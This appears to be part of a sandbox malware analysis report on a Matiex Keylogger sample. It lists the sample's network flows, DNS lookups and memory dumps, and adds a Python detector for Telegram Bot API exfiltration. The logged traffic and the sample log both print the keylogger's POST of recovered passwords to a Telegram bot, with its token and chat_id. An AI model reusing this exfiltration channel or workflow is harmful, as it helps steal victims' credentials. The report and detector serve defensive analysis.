              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4eABrVP9MhQ35iwZCWZWpSYSF3wTvWdogzM9O5LNVF3Bp25GAKpHtdAfalP%2BbJr9aPB7nURqy0NSrDWG%2FeoLbRgwIs%2BOoJGxxcrZR23FxoaxhS1LvS20Y%2BYMHiem%2Fjtg"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 67d9c9634f1972b7-AMS
              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
            • flag-unknown
              POST
              https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C
              g6yzl1NROz6FgZi.exe
              Remote address:
              149.154.167.220:443
              Request
              POST /bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1
              Content-Type: multipart/form-data; boundary=------------------------8d95d540aa5daf4
              Host: api.telegram.org
              Content-Length: 841
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Server: nginx/1.18.0
              Date: Thu, 12 Aug 2021 12:43:00 GMT
              Content-Type: application/json
              Content-Length: 529
              Connection: keep-alive
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              Access-Control-Allow-Origin: *
              Access-Control-Allow-Methods: GET, POST, OPTIONS
              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Per flow: destination, domain or URL, protocols, originating process where the sandbox attributed one, then bytes and packets sent / received, followed by the HTTP requests seen on that connection and their response codes. Only the three flows attributed to g6yzl1NROz6FgZi.exe (checkip.dyndns.org, freegeoip.app, api.telegram.org) are the sample's own traffic; the unattributed connections and those from sihclient.exe (a Windows Update component) go to Microsoft update, telemetry and OCSP endpoints and are background activity of the Windows 11 guest.

            • 2.18.105.186:80  http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409  http  sent 2.7kB / 7 packets, received 588 B / 7 packets
              POST http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 -> 302
            • 20.189.118.208:80  http://dmd.metaservices.microsoft.com/metadata.svc  http  sent 2.7kB / 7 packets, received 2.3kB / 5 packets
              POST http://dmd.metaservices.microsoft.com/metadata.svc -> 200
            • 204.79.197.203:80  http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3D  http  sent 596 B / 4 packets, received 2.6kB / 5 packets
              GET http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3D -> 200
            • 20.189.173.14:443  tls  sent 1.0kB / 6 packets (nothing received)
            • 20.54.110.119:443  tsfe.trafficshaping.dsp.mp.microsoft.com  tls, https  sent 2.7kB / 15 packets, received 6.0kB / 13 packets
            • 20.73.194.208:443  settings-win.data.microsoft.com  tls, https  sent 1.7kB / 12 packets, received 4.4kB / 10 packets
            • 52.242.101.226:443  slscr.update.microsoft.com  tls, https  sihclient.exe  sent 1.3kB / 12 packets, received 3.3kB / 9 packets
            • 52.152.108.96:443  fe3cr.delivery.mp.microsoft.com  tls, https  sihclient.exe  sent 1.2kB / 12 packets, received 3.1kB / 9 packets
            • 52.242.101.226:443  slscr.update.microsoft.com  tls, https  sihclient.exe  sent 1.2kB / 12 packets, received 3.2kB / 9 packets
            • 52.242.101.226:443  slscr.update.microsoft.com  tls, https  sihclient.exe  sent 1.3kB / 12 packets, received 3.3kB / 9 packets
            • 158.101.44.242:80  http://checkip.dyndns.org/  http  g6yzl1NROz6FgZi.exe  sent 1.1kB / 11 packets, received 1.8kB / 10 packets
              GET http://checkip.dyndns.org/ -> 200  (5 times; the sample learns its public IP in clear text over HTTP)
            • 172.67.188.154:443  https://freegeoip.app/xml/154.61.71.51  tls, http  g6yzl1NROz6FgZi.exe  sent 1.1kB / 12 packets, received 7.0kB / 10 packets
              GET https://freegeoip.app/xml/154.61.71.51 -> 200  (3 times; geolocates the IP returned by checkip.dyndns.org)
            • 149.154.167.220:443  https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C  tls, http  g6yzl1NROz6FgZi.exe  sent 2.0kB / 10 packets, received 7.3kB / 12 packets
              POST https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C -> 200
              The caption decodes to "Pc Name: Admin - Matiex Keylogger" followed by a blank line and "/ Matiex Keylogger - Recovered Passwords \"; the bot token (bot1769394961:...) and chat_id travel in the URL path and query, so they are recoverable from any TLS-inspecting proxy and are the pivot values for hunting other infected hosts.
            • 127.0.0.1:5985  BITS
            • 8.8.8.8:53  dns  sent 1.4kB / 20 packets, received 3.7kB / 20 packets (20 queries to the guest's resolver). Lookups in order, request -> response:
              crl3.digicert.com -> 93.184.220.29
              go.microsoft.com -> 2.18.105.186
              dmd.metaservices.microsoft.com -> 20.189.118.208
              oneocsp.microsoft.com -> 204.79.197.203
              nexusrules.officeapps.live.com -> 52.109.12.18
              config.edge.skype.com -> 13.107.42.23
              tsfe.trafficshaping.dsp.mp.microsoft.com -> 20.54.110.119
              ctldl.windowsupdate.com -> 95.101.78.82, 88.221.144.130
              login.live.com -> 20.190.159.138, 40.126.31.143, 20.190.159.134, 20.190.159.132, 40.126.31.4, 40.126.31.135, 40.126.31.6, 40.126.31.137
              ocsp.digicert.com -> 93.184.220.29
              settings-win.data.microsoft.com -> 20.73.194.208
              slscr.update.microsoft.com -> 52.242.101.226
              fe3cr.delivery.mp.microsoft.com -> 20.54.89.15, 52.242.97.97
              fe3cr.delivery.mp.microsoft.com -> 52.152.108.96, 52.242.97.97
              slscr.update.microsoft.com -> 40.125.122.176
              checkip.dyndns.org -> 158.101.44.242, 132.226.8.169, 216.146.43.71, 132.226.247.73, 216.146.43.70, 193.122.6.168, 193.122.130.0
              freegeoip.app -> 172.67.188.154, 104.21.19.200
              api.telegram.org -> 149.154.167.220
              ctldl.windowsupdate.com -> 93.184.221.240
              fs.microsoft.com -> 104.81.140.70
              The three lookups made by the sample resolve to the flows listed above (158.101.44.242, 172.67.188.154, 149.154.167.220). checkip.dyndns.org answers with a rotating set of seven addresses and freegeoip.app sits behind Cloudflare (the 172.67.0.0/16 and 104.21.0.0/16 answers, and the CF-RAY header on its response), so neither IP is a stable indicator; block or alert on the hostnames. api.telegram.org is the only destination that is both stable and specific to this exfiltration channel, but it is also used by legitimate bots, so pair it with the bot-token path pattern rather than the address alone.
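The three flows attributed to g6yzl1NROz6FgZi.exe are the whole exfiltration sequence: learn the public IP (checkip.dyndns.org), geolocate it (freegeoip.app), then POST the recovered passwords to a Telegram bot with sendDocument, the bot token sitting in the URL path. The Python below is an added example, not part of the sandbox report and not code from Matiex: it applies that logic to proxy-style log lines, flags any request to api.telegram.org whose path carries a Bot API token, extracts the bot id, API method and chat_id, and raises the severity when the same host and process queried an IP-lookup service earlier in the log. The log format, the hostnames WKS01/WKS02/WKS03 and the sihclient.exe and Telegram.exe lines are constructed for the example; the Telegram URL is the one observed in this report with its caption shortened.

```python
"""Detect Telegram Bot API exfiltration preceded by external-IP reconnaissance.

Added example (not part of this sandbox report and not Matiex code): scans
proxy-style log lines for requests to api.telegram.org whose path carries a bot
token, reports bot id / API method / chat_id, and raises the severity when the
same host+process queried an IP-lookup service earlier in the log.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Bot API paths look like /bot<numeric id>:<secret>/<method>. Legitimate
# Telegram clients speak MTProto and never send this path from a workstation.
BOT_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{30,50})/([A-Za-z]+)$")

# Services used to learn the victim's public IP / location before exfiltration.
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "freegeoip.app"}

# API methods that move data out; other methods (getMe, getUpdates) are recon.
EXFIL_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}

# Constructed log lines in the shape "<ts> <host> <process> <method> <url> <status>".
# The Telegram URL is the one observed in this report (caption shortened);
# the hostnames and the benign lines are made up for the example.
SAMPLE_LOG = """\
2021-08-12T12:42:41Z WKS01 g6yzl1NROz6FgZi.exe GET http://checkip.dyndns.org/ 200
2021-08-12T12:42:42Z WKS01 g6yzl1NROz6FgZi.exe GET https://freegeoip.app/xml/154.61.71.51 200
2021-08-12T12:43:00Z WKS01 g6yzl1NROz6FgZi.exe POST https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendDocument?chat_id=1735544933&caption=%20Pc%20Name 200
2021-08-12T12:43:05Z WKS01 sihclient.exe GET https://slscr.update.microsoft.com/ 200
2021-08-12T12:44:00Z WKS02 Telegram.exe GET https://api.telegram.org/ 200
"""


def parse_line(line):
    """Split one log line into a dict; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, host, process, method, url, status = parts
    u = urlsplit(url)
    return {"ts": ts, "host": host, "process": process, "method": method,
            "dst": (u.hostname or "").lower(), "path": u.path,
            "query": u.query, "status": status}


def bot_api_call(entry):
    """Return (bot_id, api_method, chat_id) for a Telegram Bot API request, else None."""
    if entry["dst"] != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(entry["path"])
    if m is None:
        return None
    chat_id = parse_qs(entry["query"]).get("chat_id", [None])[0]
    return m.group(1), m.group(3), chat_id


def analyze(log_text):
    """Return one alert per Bot API call; severity is high when recon preceded exfil."""
    did_ip_lookup = set()  # (host, process) pairs seen querying IP_LOOKUP_HOSTS
    alerts = []
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None:
            continue
        key = (e["host"], e["process"])
        if e["dst"] in IP_LOOKUP_HOSTS:
            did_ip_lookup.add(key)
            continue
        call = bot_api_call(e)
        if call is None:
            continue
        bot_id, api_method, chat_id = call
        exfil = api_method in EXFIL_METHODS
        alerts.append({
            "ts": e["ts"], "host": e["host"], "process": e["process"],
            "bot_id": bot_id, "api_method": api_method, "chat_id": chat_id,
            "severity": "high" if exfil and key in did_ip_lookup else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['host']} {a['process']} -> bot {a['bot_id']} "
              f"{a['api_method']} chat_id={a['chat_id']} at {a['ts']}")
```

Run stand-alone it prints one high-severity alert for WKS01 and nothing for the Telegram desktop client on WKS02, whose request has no /bot.../ path. The match is on the shape of the path, not on this sample's token, so the same rule fires on other Matiex builds and on any other stealer that uses the Bot API; the bot id and chat_id it extracts are the values to pivot on across the rest of the proxy logs.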

            MITRE ATT&CK Enterprise v6

            Downloads

            Dump names are <pid>-<dump index>-<start>-<end>; the 472KB region at 0x400000 in PID 4180 is the conventional image base of a 32-bit executable, so that dump is where to start when looking for the unpacked payload.

            • memory/2160-175-0x0000022002A00000-0x0000022002A10000-memory.dmp (64KB)
            • memory/2160-174-0x0000022002980000-0x0000022002990000-memory.dmp (64KB)
            • memory/4180-171-0x00000000076C0000-0x00000000076C1000-memory.dmp (4KB)
            • memory/4180-169-0x0000000005A20000-0x0000000005FC6000-memory.dmp (5.6MB)
            • memory/4180-166-0x0000000005A90000-0x0000000005A91000-memory.dmp (4KB)
            • memory/4180-160-0x0000000000400000-0x0000000000476000-memory.dmp (472KB)
            • memory/4564-152-0x00000000058B0000-0x00000000058B1000-memory.dmp (4KB)
            • memory/4564-158-0x0000000008A20000-0x0000000008AC0000-memory.dmp (640KB)
            • memory/4564-157-0x00000000063F0000-0x0000000006474000-memory.dmp (528KB)
            • memory/4564-156-0x0000000005250000-0x0000000005260000-memory.dmp (64KB)
            • memory/4564-155-0x00000000050A0000-0x00000000050A1000-memory.dmp (4KB)
            • memory/4564-154-0x0000000004E90000-0x0000000004E91000-memory.dmp (4KB)
            • memory/4564-153-0x0000000004D50000-0x00000000052F6000-memory.dmp (5.6MB)
            • memory/4564-146-0x00000000000C0000-0x00000000000C1000-memory.dmp (4KB)
            • memory/4564-151-0x0000000004DF0000-0x0000000004DF1000-memory.dmp (4KB)
            • memory/4564-150-0x0000000004D50000-0x0000000004D51000-memory.dmp (4KB)
            • memory/4564-149-0x0000000005300000-0x0000000005301000-memory.dmp (4KB)
            • memory/4564-148-0x0000000004CB0000-0x0000000004CB1000-memory.dmp (4KB)
